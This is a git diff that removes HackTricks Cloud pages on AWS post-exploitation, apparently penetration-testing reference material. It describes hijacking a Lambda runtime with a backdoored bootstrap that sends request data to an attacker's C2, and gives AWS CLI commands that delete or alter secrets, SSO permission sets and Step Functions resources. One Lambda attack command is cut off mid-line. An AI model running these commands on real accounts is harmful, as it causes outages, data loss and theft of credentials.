- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md deleted file mode 100644 index f7bea8e86..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md +++ /dev/null @@ -1,55 +0,0 @@ -# AWS - Lambda Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda - -For more information check: - -{% content-ref url="../../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} - -### Steal Others Lambda URL Requests - -If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. - -{% content-ref url="aws-warm-lambda-persistence.md" %} -[aws-warm-lambda-persistence.md](aws-warm-lambda-persistence.md) -{% endcontent-ref %} - -### Steal Others Lambda URL Requests & Extensions Requests - -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. - -{% content-ref url="../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md" %} -[aws-abusing-lambda-extensions.md](../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md deleted file mode 100644 index 94ea21684..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +++ /dev/null @@ -1,89 +0,0 @@ -# AWS - Steal Lambda Requests - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda Flow - -

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

- -1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. -2. The init process listens on port **9001** exposing some interesting endpoints: - * **`/2018-06-01/runtime/invocation/next`** – get the next invocation event - * **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke - * **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error -3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). -4. Finally, **bootstrap.py** sends to init the **response** - -Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. - -## Stealing Lambda Requests - -The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. - -This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: - -* **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. 
- * A request must be sent to **`/${invoke-id}/response`** - * The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). -* Execute a malicious **`boostrap.py`** which will handle the next invocations - * For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. - * For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. - -### Attack Steps - -1. Find a **RCE** vulnerability. -2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda\_bootstrap\_switcher/main/backdoored\_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) -3. **Execute** the malicious bootstrap. - -You can easily perform these actions running: - -```bash -python3 <[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md deleted file mode 100644 index db17d6d72..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md +++ /dev/null @@ -1,56 +0,0 @@ -# AWS - Lightsail Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lightsail - -For more information, check: - -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} - -### Restore old DB snapshots - -If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it. - -### Restore Instance Snapshots - -Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\ -Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance. - -### Access Sensitive Information - -Check out the Lightsail privesc options to learn different ways to access potential sensitive information: - -{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} -[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md deleted file mode 100644 index 9bd9c70bb..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - Organizations Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Organizations - -For more info about AWS Organizations check: - -{% content-ref url="../aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) -{% endcontent-ref %} - -### Leave the Org - -{% code overflow="wrap" %} -```bash -aws organizations deregister-account --account-id --region -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md deleted file mode 100644 index cc0591b88..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md +++ /dev/null @@ -1,76 +0,0 @@ -# AWS - Secrets Manager Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more information check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### Read Secrets - -The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. - -### DoS Change Secret Value - -Changing the value of the secret you could **DoS all the system that depends on that value.** - -{% hint style="warning" %} -Note that previous values are also stored, so it's easy to just go back to the previous value. -{% endhint %} - -```bash -# Requires permission secretsmanager:PutSecretValue -aws secretsmanager put-secret-value \ - --secret-id MyTestSecret \ - --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" -``` - -### DoS Change KMS key - -```bash -aws secretsmanager update-secret \ - --secret-id MyTestSecret \ - --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE -``` - -### DoS Deleting Secret - -The minimum number of days to delete a secret are 7 - -```bash -aws secretsmanager delete-secret \ - --secret-id MyTestSecret \ - --recovery-window-in-days 7 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md deleted file mode 100644 index 6e41ef586..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md +++ /dev/null @@ -1,117 +0,0 @@ -# AWS - SES Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SES - -For more information check: - -{% content-ref url="../aws-services/aws-ses-enum.md" %} -[aws-ses-enum.md](../aws-services/aws-ses-enum.md) -{% endcontent-ref %} - -### `ses:SendEmail` - -Send an email. - -{% code overflow="wrap" %} -```bash -aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json -aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json -``` -{% endcode %} - -Still to test. - -### `ses:SendRawEmail` - -Send an email. - -```bash -aws ses send-raw-email --raw-message file://message.json -``` - -Still to test. - -### `ses:SendTemplatedEmail` - -Send an email based on a template. - -{% code overflow="wrap" %} -```bash -aws ses send-templated-email --source --destination --template -``` -{% endcode %} - -Still to test. - -### `ses:SendBulkTemplatedEmail` - -Send an email to multiple destinations - -```bash -aws ses send-bulk-templated-email --source --template -``` - -Still to test. - -### `ses:SendBulkEmail` - -Send an email to multiple destinations. - -``` -aws sesv2 send-bulk-email --default-content --bulk-email-entries -``` - -### `ses:SendBounce` - -Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. - -{% code overflow="wrap" %} -```bash -aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list -``` -{% endcode %} - -Still to test. - -### `ses:SendCustomVerificationEmail` - -This will send a customized verification email. You might need permissions also to created the template email. - -{% code overflow="wrap" %} -```bash -aws ses send-custom-verification-email --email-address --template-name -aws sesv2 send-custom-verification-email --email-address --template-name -``` -{% endcode %} - -Still to test. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md deleted file mode 100644 index ccffb5ede..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - SSO & identitystore Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SSO & identitystore - -For more information check: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` - -These permissions can be used to disrupt permissions: - -{% code overflow="wrap" %} -```bash -aws sso-admin delete-permission-set --instance-arn --permission-set-arn - -aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --permission-set-arn --permissions-boundary-policy-arn - -aws sso-admin delete-account-assignment --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md deleted file mode 100644 index 67719fd73..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ /dev/null @@ -1,105 +0,0 @@ -# AWS - Step Functions Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Step Functions - -For more information about this AWS service, check: - -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} - -### `states:RevealSecrets` - -This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. - -
- -### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` - -An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. - -{% hint style="info" %} -* Deleting a state machine you also delete all its associated versions and aliases. -* Deleting a state machine alias you do not delete the state machine versions referecing this alias. -* It is not possible to delete a state machine version currently referenced by one o more aliases. -{% endhint %} - -```bash -# Delete state machine -aws stepfunctions delete-state-machine --state-machine-arn -# Delete state machine version -aws stepfunctions delete-state-machine-version --state-machine-version-arn -# Delete state machine alias -aws stepfunctions delete-state-machine-alias --state-machine-alias-arn -``` - -* **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. - -### `states:UpdateMapRun` - -An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. 
- -{% code overflow="wrap" %} -```bash -aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] -``` -{% endcode %} - -* **Potential Impact**: Performance degradation, and disruption of critical workflows. - -### `states:StopExecution` - -An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption. - -{% hint style="warning" %} -This action is not supported by **express state machines**. -{% endhint %} - -{% code overflow="wrap" %} -```bash -aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] -``` -{% endcode %} - -* **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. - -### `states:TagResource`, `states:UntagResource` - -An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - -```bash -aws stepfunctions tag-resource --resource-arn --tags Key=,Value= -aws stepfunctions untag-resource --resource-arn --tag-keys -``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md deleted file mode 100644 index 4ca191307..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - VPN Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## VPN - -For more information: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/README.md deleted file mode 100644 index 5d96ec8ca..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md +++ /dev/null @@ -1,51 +0,0 @@ -# AWS - Privilege Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
